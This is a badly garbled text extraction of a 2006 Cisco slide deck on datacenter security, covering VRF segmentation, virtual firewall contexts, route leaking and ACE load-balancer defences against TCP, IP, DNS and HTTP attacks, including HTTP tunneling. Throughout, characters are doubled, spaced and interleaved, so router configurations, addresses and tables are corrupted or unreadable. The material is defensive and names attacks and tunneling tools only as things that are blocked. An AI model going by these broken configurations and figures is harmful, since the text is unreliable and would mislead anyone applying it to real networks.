n1 rd 0.
11 di .1
10 in 1.
te p p
er v a
rf vr ad
fa rf dd
ac f dr
ce f re
e V Vl fo or rw es ss s
la wa 2
an ar 20
n1 rd 0.
12 di .1
20 in 1.
0
ng g V VP PN N1 1 .1 1. .2 2 2 25 55 5. .2 25 55 5. .2 25 55 5. .0 0
0
0
ng g V VP PN N2 2 .1 1. .2 2 2 25 55 5. .2 25 55 5. .2 25 55 5. .0 0
ng g V VP PN N1 1 .1 1. .1 1 2 25 55 5. .2 25 55 5. .2 25 55 5. .0 0 0
ng g V VP PN N2 2 .1 1. .1 1 2 25 55 5. .2 25 55 5. .2 25 55 5. .0 0 39
8 0 2 . 1 q t ags end-t o -end Trunk with s witc hp o rt
4 –R o u tin g P r o c e s s e s A n d th e n r u n n in g s e p a r a te O S P F p r o c e s s e s p e r V R F s Ca t 4 5 0 0
2 0 0 0 -2 0 0 3
r ro ou n ne n ne !! r ro ou n ne n ne !!
ut et et
te tw tw
er wo wo
r o os or rk k or rk k
s pfpf 1 1. .0 1 10 0.
11 0. .0 .0 0.
v vr rf 0. .0 0 .0 0. .0
f V VP 0 0. .2 0 0 0.
PN 25 .2
N1 55 25
ut et et
te tw tw
er wo wo
r o os or rk k or rk k
s pfpf 2 2. .0 2 20 0.
22 0. .0 .0 0.
v vr rf 0. .0 0 .0 0. .0
f V VP 0 0. .2 0 0 0.
PN 25 .2
N2 55 25
1
5. 55
.2 5.
25 .2
55 25
5. 55
.2 5.
25 .2
55 5 a 25 55 5
ar a
re ar
ea a 0 0 re ea a 0 0
5. 55
.2 5.
25 .2
55 25
5. 55
.2 5.
25 .2
55 5 a 25 55 5
ar a
re ar
ea a 0 0 re ea a 0 0
2
Ca t 65 0 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
40
I nt er V R F C o m m u ni c at i o n T wo B as ic M o d els :
1 . C o ntro lled b y Firewalls / A C L s :
Provides p rot ec t ed a c c ess t o S h a red S ervic es Provides p rot ec t ed c om m u n ic a t ion b et w een V R F s I s eq u iva l en t t o in t erc on n ec t in g sep a ra t e I P n et w ork s � R ou t in g b et w een n et w ork s oc c u rs a t sp ec if ic GW Y p oin t s
2 . R o u te L eak ing b etween V R Fs u s ing a B G P p ro c es s
Provides u n -p rot ec t ed c om m u n ic a t ion b et w een V R F s A l l ow s ex t ra n et c rea t ion f or sh a red servic es Pop u l a t es rou t in g t a b l es t o en a b l e rea c h a b il it y b et w een V PN s � R ou t in g b et w een n et w ork s is op t im a l � N o in t er V PN p ol ic y en f orc em en t p ossib l e
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
41
Agenda � Datacenter Security Threats � Datacenter Desig n O v erv iew � Datacenter V irtual iz atio n
� C isco I P serv ice in v irtual iz ed architecture ex am p l es –V irtual iz ed central Firewall D ep lo y m ent ex am p le
– H o w A C E L o ad b alanc er h elp to s ec u re s erv er f arm . • HTTP inspection in action HTTP tunneling • HTTP inspection in action U
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
R L c a no nic a liz a tio n
42
F i r ew al l S er v i c es M o du l e
C isco’s H igh est Perform a nce F irew a l l � Tr anspar ent ( L 2 ) and R ou ted ( L 3 ) f ir ew al l s in th e sam e ser v ice m od u l e � R esou r ce M anag er : A ssig n S er v ice C l asses, R esou r ce L im its
� 2 5 6 V L A N s per contex t w ith m ax im u m of 2 0 0 0 V L A N s
� L A N f ail ov er activ e/ stand b y and activ e/ activ e ( b oth intr a/ inter ch assis)
P er f o r m a n ce � Hig h Per f or m ance F ir ew al l : 5 . 5 G b ps b and w id th
� D y nam ic R ou ting : O S PF and R I P ( 2 O S PF v ir tu al r ou ter s) ( m ono contex t onl y ) . S tu b B G P in 3 . 2 ev en in m u l ti contex ts.
� 2 . 8 5 M il l ion pps th r ou g h pu t
� S u ppor t m u l tipl e b l ad es in th e ch assis, u p to 4 f or 2 0 G b ps
� 1 0 0 K new connections/ sec f or HTTP, D N S and enh anced S M TP
� S u ppor ted on N ativ e I O S 1 2 . 1 ( 1 3 E ) and C atO S 7 . 5 ( 1 ) onw ar d s
� 1 m il l ion concu r r ent connections � 2 5 0 V ir tu al f ir ew al l s / contex ts
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
� 8 0 K access-l ists enf or ced in h ar d w ar e � J u m b o-r ead y ( 9 0 2 2 b y tes)
43
V i r t u al F i r ew al l O v er v i ew � Context hierarchy: Ad m i n co n t ex t R em o t e r o o t a ccess
S y st em A Ad m i n
( m a nd a to ry )
ex ecu t i o n sp a ce i . e. “sessi o n sl o t 6” T h e r o o t co n t ex t
B
(m a n d a to r y ) C
S ecu r i t y co n t ex t s ssh , t el n et , i p sec, h t t p s
� T here is no p ol icy inheritance b etw een contexts
� T he s ys tem s p ace u s es the ad m in context f or netw ork connectiv ity; s ys tem s p ace creates other contexts F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
44
E ac h V F W
c an b e r o u t ed o r t r ans p ar ent c lie n t
V la n3 0
V la n3 0 1 0 .3 0 .1 .0 /2 4
C a ta ly s t 6 5 00
R o u ted m o d e
S lo t 5
1 0 .3 0 .1 .0 /2 4
F a 8 /1
C a ta ly s t 6 5 00
o u t side 1 0 .3 0 .1 .1
FW SM
S lo t 5
F a 8 /1 o u t side
inside
F a 8 /2
F a 8 /2 V la n3 1
WEB ©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
T rans p arent m o d e
FW SM
1 0 .6 0 .1 .1 inside
V la n6 0 1 0 .6 0 .1 .0 /2 4
F b o n n e a u -a s a
c lie n t
C is c o C o n fid e n tia l
1 0 .3 0 .1 .0 /2 4
WEB 45
W h y r u n T r ans p ar ent m o de? Ba ck b o n e
�H S R P , V R R P , G L B P
�O S P F , E IG R P , R IP , et c .
�P IM , m u l t ic a st t r a f f ic � B P D U s, IP X , M P L S
� � � �
M S F C 1 0 .1 .2 .3
V la n2 0
F W S M V la n3 0
1 0 .1 .2 .3
2 2 4 .0 .0 .2
O K if A C L p er m it s
1 0 .1 .2 .4
R o u te r
Routers can establish routing protocols adjacencies through the f irew all P rotocols such as H S RP , V RRP , G L B P can cross the f irew all M ulticast stream s can also trav erse the f irew all N on-I P traf f ic can be allow ed ( pre-conf igured ty pes are I P X , M P L S , B P D U s)
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
46
V i r t u al F i r ew al l R es o u r c e M anager � I n s y s tem
m o d e, u p to 2 5 6 classes c an b e d ef ined
� I nd iv id u al c o ntex ts are th en m ap p ed to c las s es
� W ith in a c las s , lim its c an b e ap p lied to s p ec if ic res o u rc es • Co n n s:
• F i x u p s: • S y sl o g s:
CP S F i x u p s/ sec S y sl o g s/ sec
R R a at e t el i l m i m i t i ed t ed
Co n n s H o st s I P sec S S H T el n et
Co n n ect i o n s H o st s I P sec M g m t T u n n el s S S H S essi o n s T el n et S essi o n s
X l a t es M AC-en t r i es AL L
AbAb soso l u l u t e t el i l m i m i t i s ts
� L im its s p ec if ied as integ er o r % ; 0 m eans no lim it
� R es o u rc es can b e o v ers u b s c rib ed : e.g . c las s as s ig ns m ax 1 0 % res o u rc es , b u t 5 0 c o ntex ts are m ap p ed to it F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
o f 47
R es o u r c e l i m i t i ng and m o ni t o r i ng FWSM-6 K 1 -2 0 4 3 #
R e so u r c e
sh r e so u r c e
b ri d g e -ta b l e -e n tri
u sa g e
C u r r e n t
C o n n s
X l a te s H o s ts
b ri d g e -ta b l e -e n tri X l a te s
7 1
2
1 2
2 7
2
H o s ts
2
b ri d g e -ta b l e -e n tri T e l n e t
FWSM-6 K 1 -2 0 4 3 #
R e so u r c e
sh r e s u sa g e
b ri d g e -ta b l e -e n tri
C u r r e n t
b ri d g e -ta b l e -e n tri
b ri d g e -ta b l e -e n tri
FWSM-6 K 1 -2 0 4 3 #
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
M a x i m u m
7
7
2
L i m i t
3
u n l i m i te d
3
u n l i m i te d
u n l i m i te d
u n l i m i te d
7 4
1
r e s b r i d g e 8
M a x i m u m
C is c o C o n fid e n tia l
4
5 0
8
u n l i m i te d
0 0
C o n t e x t
0
a d m i n
0
c l i e n t-h s rp
c l i e n t-h s rp
c l i e n t-h s rp
0
1
5 0
D e n i e d
5 0
0
8
5 0
0
5
L i m i t
u n l i m i te d
c l i e n t-h s rp 0
u n l i m i te d
1 2 7
7
D e n i e d
0
0
0
s e rv e r-h s rp
0
s e rv e r-h s rp
s e rv e r-h s rp s y s te m
C o n t e x t a d m i n
c l i e n t-h s rp
s e rv e r-h s rp
48
V i r t u al F i r ew al l C o nc ep t - C o nt ex t s i nterf a c e V l a n1 0 1 i p v rf f o rw a rd i ng V P N 1 i p a d d res s 1 0 . 1 0 . 1 0 1 . 1 2 5 5 . 2 5 5 . 2 5 5 . 0
c o ntex t B l u e l o g i c a l -i nterf a c e v l a n1 0 1 l o g i c a l -i nterf a c e v l a n1 1 1
i nterf a c e V l a n1 0 2 i p v rf f o rw a rd i ng V P N 2 i p a d d res s 1 0 . 1 0 . 1 0 2 . 1 2 5 5 . 2 5 5 . 2 5 5 . 0
C a t6 K M P L S C lo u d o r V R F -L i te
V R F
V L A N 1 0 1 ,1 0 2 ( i ns i d e)
V R F
V F W
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
T ru nk (V L A N 1 1 1 ,1 1 2 )
V F W
� R ou t ed or T ra n sp a ren t m ode � I n dep en den t p ol ic ies p er c on t ex t � I n dep en den t m a n a g em en t p er c on t ex F b o n n e a u -a s a
V L A N 1 1 1 ,1 1 2 ( o u ts i d e)
C is c o C o n fid e n tia l
Internet E d g e
c o ntex t R ed l o g i c a l -i nterf a c e v l a n1 0 2 l o g i c a l -i nterf a c e v l a n1 1 2
49
I nt er -V P N
C o m m u ni c at i o n
2 a
FW in Single Routed Mode
FW—S i n g l e R o u t e r M o d e ( N o C o n t e x t s )
V L A N
2 0 1 0
1 0 .1 1 .1 .0 /2 4
V L A N
OSPF
2 0 2 0
2 0 .1 1 .1 .0 /2 4
OSPF
V R F V PN 1
1 0 .1 .1 .0 /2 4
F b o n n e a u -a s a
V R F V PN 2
V L A N
1 1 0
FW i s a n OSPF R o u t e r . T r a f f i c f r o m On e V R F t o t h e Ot h e r i s E n t i r e l y G o v e r n e d b y t h e Se c u r i t y Po l i c y D e f i n e d o n t h e FW SM
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
V L A N
1 2 0
2 0 .1 .1 .0 /2 4
50
I nt er -V P N
C o m m u ni c at i o n
2 b
FW in T r a ns p a r ent Mode
FW—T r a n s p a r e n t M o d e
V L A N
4 0 0
V L A N
4 0 1
1 0 .2 2 5 .2 2 5 /2 4
OSPF, PI M V R F V PN 1
V R F V PN 2 FW
1 0 .2 2 0 .2 2 0 .0 /2 4
F b o n n e a u -a s a
V L A N
4 04
d o e s n o t p a r tic ip a t th e IG P T r a ffic fr o m o n e V R Fto Ot h e r i s E n t i r e l y G o v e r b y t h e Se c u r i t y Po l i c D e f i n e d o n t h e FW
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
e in th e n e d y
V L A N 120
2 0 .1 .1 .0 /2 4
51
I nt er -V P N
C o m m u ni c at i o n
Multi-C ontex t T r a ns p a r ent Mode—P a ir s V R F2 OSPF
OSPF c x t1
c x t2
c x t3 V R F3
V R F1 OSPF
� O ne c o ntex t p er V R F p air, T rans p arent m o d e
� Filtering ru les h av e to b e d o ne m u ltip le tim es f o r eac h V R F p air
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
52
I nt er -V P N
C o m m u ni c at i o n
Multi-C ontex t T r a ns p a r ent Mode—P a ir s
?
c x t6
V R F2
V R F4
S h a re d S e r v ic e s
c x t1
c x t2
c x t3
c x t5
c x t4 V R F3
V R F1
� O ne c o ntex t p er V R F p air, T rans p arent m o d e
� Filtering ru les h av e to b e d o ne m u ltip le tim es f o r eac h V R F p air � V ery lim ited s c alab ility � an alternativ e is req u ired � H o w s h o u ld s h ared s erv ic es b e reac h ed ? F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
53
I nt er -V P N
C o m m u ni c at i o n
2 c
T r a ns p a r ent Mode—Fus ion Router / V RF Fu s i o n R o u t e r / V R F
c tx 1
O S P F , E IG R P
c tx 2
V R F1
S h a re d S e r v ic e s
O S P F , E IG R P
V R F2
� F u sion R ou t er/ V R F ( h u b a n d sp ok e) : A l l in t erV PN t h is R ou t er/ V R F � F W
c tx 3
V R F3 t ra f f ic m u st g o t h rou g h
C on t ex t s c ou l d b e m a n a g ed p er V PN
� R ou t in g p rot oc ol b et w een V R F s c ou l d b e E I GR P t o a l l ow rou t e f il t erin g c a p a b il it ies F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
54
F u s i o n V R F S i ngl e D ev i c e I m p l em ent at i o n eB G P p eer ing b etw een V RFs on a s ingle r outer S h a re d S e r v ic e s
Fu s i o n V R F
c tx 1
e B G P
c tx 2
V R F1
e B G P
e B G P
V R F2
c tx 3
V R F3
� A l l V R F s ( in c l u din g F u sion ) reside on t h e sa m e p h y sic a l devic e � eB GP p eerin g w it h in t h e sa m e devic e req u ires: B G P r ou ter -id per V R F
M u l ti-A S su ppor t f or B G P
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
55
Route Leaking Between VRFs
Singl e B ox ex tra net - Using a B G P Process a B G P Pr o c e s s to le a k th e ro u te s b e tw e e n V R Fs
B lu e R e d
I m p o r t -e x p o r t b e t w e e n V R Fs u s in g R T
Sh a r e d Se r v i c e s
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
56
S ingl e Box E x tr anet I m p l em entation B G P Process
router router b b g g p p 6 6 5 5 0 0 0 0 11 b b g g p p l l ogog -n-n eiei g g h h b b or-c or-c h h a a n !! a a d d d d res res s s -f-f a a m m i i l l y y i i p p v v 4 4 v red red i i s s tri tri b b ute ute osos p p f f 22 n n oo a a uto-s uto-s umum m m a a ryry n n oo s s y y n n c c h h ron ron i i z z a a titi onon exex i i t-a t-a d d d d res res s s -f-f a a m m i i l l y y !! a a d d d d res res s s -f-f a a m m i i l l y y i i p p v v 4 4 v red red i i s s tri tri b b ute ute osos p p f f 11 n n oo a a uto-s uto-s umum m m a a ryry n n oo s s y y n n c c h h ron ron i i z z a a titi onon exex i i t-a t-a d d d d res res s s -f-f a a m m i i l l y y !! a a d d d d res res s s -f-f a a m m i i l l y y i i p p v v 4 4 v red red i i s s tri tri b b ute ute osos p p f f 33 n n oo a a uto-s uto-s umum m m a a ryry n n oo s s y y n n c c h h ron ron i i z z a a titi onon exex i i t-a t-a d d d d res res s s -f-f a a m m i i l l y y !!
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
n g g eses v rfrf B B L L U U E E
v rfrf R R E E D D
N e to b e
e d a le a k tw e e
B G th e n V
P P ro c e s s ro u te s R Fs
D o n ’t n e e d a n y b g p n e ig h b o r s /s e s s io n s
v rfrf S S E E R R V V I I C C E E S S
C is c o C o n fid e n tia l
57
S ingl e Box E x tr anet I m p l em entation
V R F C onfigura tion – Serv ices E x tra net V PN ip ip v r rd d r ro ou r ro ou r ro ou r ro ou !! ip ip v r rd d r ro ou r ro ou r ro ou !! ip ip v r rd d r ro ou r ro ou r ro ou F b o n n e a u -a s a
vr rf f S SE 1 10 0: :1 10 u t t e e -t-t a u t t e e -t-t a u t t e e -t-t a u t t e e -t-t a
ar ar ar ar
vr rf f R RE 3 30 0: :3 30 u t t e e -t-t a u t t e e -t-t a u t t e e -t-t a
ED D 0 ar rg ge ar rg ge ar rg ge
e t t e e x x popo r r t t 3 3 : : 3 3 e t t imim popo r r t t 3 3 : : 3 3 e t t imim popo r r t t 1 1 : : 1 1
vr rf f B BL 2 20 0: :2 20 u t t e e -t-t a u t t e e -t-t a u t t e e -t-t a
LU 0 ar ar ar
e t t e e x x popo r r t t 2 2 : : 2 2 e t t imim popo r r t t 2 2 : : 2 2 e t t imim popo r r t t 1 1 : : 1 1
0
ER RV VI IC CE ES S rg rg rg rg
ge ge ge ge
et et et et
t e e x x popo r t imim popo r t imim popo r t imim popo r
rt rt rt rt
t 1 1: t 1 1: t 3 3: t 2 2:
:1 :1 :3 :2 1
1 3
2
UE E rg rg rg
ge ge ge
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
58
D ep l o y m ent ex am p l e
1 A c c e s s
N e e d FW H e re !
2 D is tr ib u tio n N e e d FW H e re !
3 C o re
N e e d FW H e re !
Cat 6K
4 D is tr ib u tio n 5 A c c e s s F b o n n e a u -a s a
F W S M
F W S M
C O R E -G Cat 6K
N e e d FW H e re !
Dist -H D
Dist –H G
6
WAN1-S W
F W S M
7
F W S M
F W S M
F W S M
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
T o i p 1-S W
S S E-S W A C U i s cT o -SC o n W fid e n
tia l
N e e d FW H e re !
C O R E -D Cat 6K
Dic t -B D
Dist -B G Cat 6K
WAN2 -S W
Cat 6K
N e e d FW H e re !
Cat 6K
59
S ec u r i t y D o m ai ns ? D o m a i n e s éc u r i t é f i l t r é p a r FW c o e u r D o m a i n e s éc u r i t é n o n f i l t r é p a r FW c o e u r V la n s u tilis a te u r s
V la n 1 2 0
D o m a i n e s éc u r i t é s e r v e u r n °1
V la n 2 1 0 V la n 2 1 1
V la n s s e r v e u r s
V la n 2 0 V la n 2 1 V la n 2 2
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
V la n 1 1 0 V la n 1 1 1 1
D o m a i n e s éc u r i t é u t i l i s a t e u r n °2
V la n 1 0 V la n 1 1 V la n 1 2
F b o n n e a u -a s a
D o m a i n e s éc u r i t é u t i l i s a t e u r n °1
D o m a i n e s éc u r i t é s e r v e u r n °2
V la n 2 2 0 V la n 2 2 1 V la n 2 2 2
C is c o C o n fid e n tia l
60
A r c h itec tur e v ir tuel l e / FW
V l a n u t i l i s a t e u r n °1 n o n f i l t r é
– LA N
S ite X
V l a n u t i l i s a t e u r n °2 f i l t r é ( d o m a i n e s éc u r i t é v e r t ) D i s tri b / u s er
D i s tri b / u s er
6 5 0 0 /S U P 7 2 0
6 5 0 0 /S U P 7 2 0
C o re
C o re
6 5 0 0 /S U P 7 2 0
6 5 0 0 /S U P 7 2 0
D i s tr i b / S e r v e u r s
D i s tr i b / S e r v e u r s
65 0 0 / S U P 7 2 0
F b o n n e a u -a s a
65 0 0 / S U P 7 2 0
©2 0 0 6 C is c o S y s te m s , In c . A
V l a n s e r v e u r n °1 f i l t r é ( d V l a n s e r v e u r n °2 f i l t r é ( d V la n s e r v e u r n ll r ig h ts r e s e r v e d . C is c o C o n fid e n tia l V la n s e r v e u r n
o m o m °3 °4
a in a in n o n n o n
e s éc u r i t é r o u g e ) e s éc u r i t é j a u n e ) filtr é filtr é
61
Agenda � Datacenter Security Threats � Datacenter Desig n O v erv iew
� Secure a C isco Datacenter I nf rastructure � Datacenter V irtual iz atio n
� C isco I P serv ice in v irtual iz ed architecture ex am p l es –V irtual iz ed central Firewall D ep lo y m ent ex am p le – H o w A C E L o ad b alanc er h elp to s ec u re s erv er f arm . • HTTP inspection in action HTTP tunneling • HTTP inspection in action U R L c a no nic a liz a tio n
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
62
W h at I s AC E ? A ppl ica tion C ontrol E ngine
� N ew p ro d u c t line in th e C is c o A N S p o rtf o lio
� I nf ras tru c tu re s im p lic ity in a s ing le h ard ware p latf o rm , A C E integ rates C on t en t sw it c h in g S S L of f l oa d
D a ta c e n te r s e c u r ity fe a tu r e s
� T h e f irs t A C E p ro d u c t is a C is c o C ataly s t® 6 5 0 0 s erv ic e m o d u le, wh ic h c o m es in th ree f lav o u rs : 4 G b p s , 8 G b p s , and 1 6 G b p s
� T h e h ard ware s u p p o rts two f ield -rep lac eab le d au g h terc ard s f o r f u tu re h ard ware-ac c elerated ap p lic atio n d eliv ery f u nc tio nality lik e H T T P c o m p res s io n
� I t d eliv ers ap p lic atio n inf ras tru c tu re c o ntro l, with f eatu res lik e v irtu al p artitio ns and nativ e ro le b as ed ac c es s c o ntro l ( R B A C ) F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
63
IP Services & Security
ex : L oa d B a la nc ing / SSL w ith A C E Ph y s i c a l D e v i c e
Ad m i n Co n t ex t
V-R a ck 1
V-R a ck 2
V-R a ck 3
G l o b al Co n f i g u r ati o n Co n te x t D e f i n i ti o n R e s o u r c e A l l o c ati o n A d m i n M an ag e m e n t
M a n a g e m e n t s ta tio n
A A A F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
64
S ec u r i t y F eat u r es i n AC E � TC P / I P no rm al iz atio n
–B u ilt-in T rans p o rt P ro to c o l Sec u rity –U s er C o nf ig u rab le, to m eet Sec u rity R eq u irem ents
� A p p l icatio n P ro to co l I nsp ectio n � A d v anced H TTP I nsp ectio n
–R FC C o m p lianc e –M I M E T y p e V alid atio n –P rev ent T u nneling P ro to c o ls o v er H T T P P o rts
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
65
T C P ex p l oits b l oc ked b y A C E 1 . T C P c h e c k s p e r fo r m e d b y d e fa u lt: � � � � � � � � �
E nf or ces cor r ect u sag e of TC P f l ag s ( can b e d isab l ed ; f l ag s can b e cl ear ed )
R and om iz ation of seq u ence nu m b er s ( cl oak s O S ty pe, m ak es f ing er pr inting r econ attack s u nr el iab l e, pr ev ents m an-in-th e-m id d l e session h ij ack ing ) E nf or ces cor r ect h ead er l eng th Pr ev ents ou t-of -state pack ets
Pr ev ents pack ets th at d o not b el ong to ex isting connections Possib il ity to d ef ine m ax im u m
nu m b er of conns per second
M atch es TC P l eng th w ith I P h ead er ’s + d ata B l ock s il l icit por ts ( por t = z er o) E nf or ces m in and m ax M S S
�E x a m p le o f b lo c k e d a tta c k s : T e a r D r o p , S e s s io n H ija c k in g , J o lt, B l o o p , T a r g a , B o n k , B o i n k , Fr a g g l e , X m a s s c a n , n u l l s c a n , e t c .
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
66
I P / U D P / I C M P ex p l oits blocked by ACE
1 .
� � � � � �
2 .
� � �
IP c h e c k s p e r fo r m e d b y A C E :
A u tom atic A nti-spoof ing ( sou r ce I P = d est I P) ; u nicast R PF ch eck Head er l eng th ch eck ( m in and m ax l eng th s, L 3 < L 2 ) I P options contr ol
D r op il l icit I P ad d r esses ( sou r ce I P = cl ass D
or b r oad cast or l oopb ack )
O v er l apping f r ag m ents d r opped , contr ol ov er m ax nu m b er of f r ag m ents ARP Inspection in transparent mode
IC M P c h e c k s p e r fo r m e d b y d e fa u lt: R eq u ests and r esponses m atch ing
Pr ev ents inj ection of u nsol icited I C M P er r or s
C ou nter m easu r es specif ied in d r af t-g ont-tcpm -icm p-attack s. tx t
�B lo c k e d a tta c k s : T im e s ta m p /r o u te r e c o r d /s o u r c e r o u tin g /fr a g m e n t D o S a tta c k s , IP s p o o fin g , P in g o f D e a th , IC M P Fl o o d , S m u r f , A R P a t t a c k s F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
67
T C P / I P p r otoc ol ex p l oits p r ev en t ed by ACE
1 . FT P a b u s e � � � � � �
ACE’s F T P i n s p e c t i o n e n g i n e c a n m a t c h r e q u e s t s a n d r e s p o n s e s D ro p tru n c a te d c o m m a n d s
Ch e c k s t h e s i z e o f R ET R / S T O R En f o r c e R F C c o m p l i a n c e B l o c k P AS V s e n t f r o m
c o m m a n d s
c lie n ts
V e r ify th e r a n g e o f d y n a m ic a lly n e g o tia te d p o r ts
2 . D N S e x p lo its � � �
ACE m a t c h e s D N S r e q u e s t s a n d r e s p o n s e s En f o r c e s l a b e l l e n g t h s c h e c k s
T e a r s d o w n U D P c o n n e c tio n s a fte r r e c e p tio n o f a r e p ly
� B l o c k e d a t t a c k s : FT P ‘P O R T ’ a t t a c k s , FT P B o u n c e , D N S f l o o d s
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
68
“Lev el 1 ” H T T P attac ks blocked by ACE 1 .
E n cr y p t ed ch a n n el a t t a ck s - H T T P S d ecr y p t i o n
2 .
W o r m s a n d d a y -z er o a t t a ck s
3 . 4 . 5 . 6. 7. F b o n n e a u -a s a
ACE i s e q u i p p e d w i t h a p o w e r f u l S S L o f f l o a d / t e r m i n a t i o n c h i p , g i v i n g i t f u l l v i s i b i l i t y i n t o a t t a c k s h o p in g to g e t a r o u n d s e c u r it y d e v ic e s b y r id in g o n t o p o f a n e n c r y p t e d c h a n n e l ACE’s e a h
H T T P n g in e . tta c k s e a d e rs
in s p U s in fo r w , th e
e c t io g re g h ic h U R L
R F C co m p l i a n ce
n e u la n o o r
n g r e k n e v
in e c o n t a in x p r e s s io n s o w n re m e d e n th e p a y
s a , u s y is lo a d
p o w e r e rs c a p u b lis o f H T
fu n h T
l f u l l y -c u s t o m i z a b l e r e g u l a r e x p r e s s i o n d e v e lo p s ig n a tu r e s t h a t c a n b lo c k w o r m s a n d e d y e t ! R e g e x e s c a n b e a p p lie d o n th e P tr a f f ic .
ACE’s H T T P i n s p e c t i o n e n g i n e a u t o m a t i c a l l y e n f o r c e s R F C2 6 1 6 c o m p l i a n c e a n d c a n d r o p a n y m e t h o d s , m i m e -t y p e s o r t r a n s f e r e n c o d i n g a s c o n f i g u r e d b y t h e u s e r
Bu f f er O v er f l o w s M a x im u m
H T T P h e a d e r le n g th c a n b e e n f o r c e d , a v o id in g a tt e m p t s a t b u ff e r o v e r f lo w e x p lo it s
D i r ect o r y t r a v er sa l s
An a t t e m p t a t w o r k i n g o n e ’s w a y u p a n H T T P s e r v e r ’s d i r e c t o r y s t r u c t u r e b y u s i n g . . / . . i n G ET r e q u e s t s . Ea s i l y b l o c k e d b y ACE’s r e g u l a r e x p r e s s i o n f i l t e r s .
M a l i ci o u s U R L s
ACE a l w a y s c a n o n i c a l i z e s U R L s , d e f e a t i n g a n y a t t a c k s r e l y i n g o n e n c o d e d U R L
P eer -t o -p eer , I n st a n t M essa g i n g , H T T P -T u n n el s
T r a f f i c t u n n e l e d o v e r H T T P c a n b e b l o c k e d b y ACE’s H T T P i n s p e c t i o n e n g i n e ©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
69
HTTP inspection in action HTTP tunneling
fb o n n e a u @
c is c o .c o m
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
70
I nt r o du c i ng H T T P t u nnel s � V a riou s f ree or c om m erc ia l p rog ra m s t h a t t a k e c l ien t t ra f f ic ( a n y T C P/ U DP) a n d rel a y t o a c c om p l ic e w eb server over H T T P ( u sin g PO S T req u est s m ost of t h e t im e) � U se p rop erl y f orm a t t ed H T T P
passes L 4 f ir ew al l s passes stand ar d HTTP ch eck s ( R F C
com pl iance, etc. )
� W eb server dem u x es t h e t ra f f ic a n d sen ds t o in t en ded rec ip ien t / t a rg et � Prog ra m s in c l u de: F ir epass HTu n Httptu nnel Hopster …
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
71
[ 2 0 ] ace
switch/lab# sh ru n int G e ne rating co nf ig u ratio n. . . . inte rf ace ip ad d re acce ss-g no shu td inte rf ace ip ad d re no shu td
v lan ss 1 0 ro u p o wn v lan ss 1 0 o wn
A C E o n l y p er m i t s H T T P . t el n et t o t ar g et !
C l i en t
can
s t i l l
[ 1 0 0 ]
C o m p r o m is ed w eb 1 0 . 1 0 . 1 0 . 1 0 1
Router
s er v er
2 0
. 2 0 . 1 0 . 4 2 55. 2 55. 2 55. 0 inp u t http inbo u nd 1 0 0 . 1 0 . 1 0 . 4
ta r g et 1 0 . 4 8 . 8 2 . 6 5
2 55. 2 55. 2 55. 0
